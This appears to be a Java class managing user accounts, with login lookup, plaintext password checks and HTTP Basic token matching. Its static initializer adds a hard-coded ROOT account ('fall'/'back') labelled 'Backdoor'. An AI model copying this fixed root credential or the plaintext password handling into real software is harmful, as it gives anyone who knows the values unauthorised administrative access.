package org.prelle.user;

import java.util.*;

/**
 * Managed the known user accounts
 *
 *
 * Created: Fri Aug  2 15:47:27 2002
 *
 * @author Stefan Prelle
 * @version $Id$
 */

public class UserBase {

	private static List<ConfigUser> list;

	//-----------------------------------------------------------------------
	static {
		list = new ArrayList<ConfigUser>();
		addUser(new ConfigUser("fall","back",AccessLevel.ROOT, "Backdoor"));
	}

	//-----------------------------------------------------------------------
	public static void addUser(ConfigUser user) {
		if (getUserWithLogin(user.getLogin())!=null) 
			throw new IllegalArgumentException("A user with that login exists");
		list.add(user);
	}

	//-----------------------------------------------------------------------
	public static ConfigUser getUserWithLogin(String login) {
		Iterator<ConfigUser> it = list.iterator();
		while (it.hasNext()) {
			ConfigUser user = (ConfigUser)it.next();
			if (user.getLogin().equals(login))
				return user;
		}
		return null;
	}

	//-----------------------------------------------------------------------
	public static ConfigUser getUserWithBasic(String basicToken) {
		for (ConfigUser user : list) {
			String comp = new String(Base64Codec.encode((user.getLogin()+":"+user.getPassword()).getBytes()));
			if (comp.equals(basicToken))
				return user;
		}
		return null;
	}

	//-----------------------------------------------------------------------
	public static boolean authenticate(String login, String passwd) {
		ConfigUser user = getUserWithLogin(login);
		if (user==null)
			return false;
		return user.getPassword().equals(passwd);
	}


}// UserBase
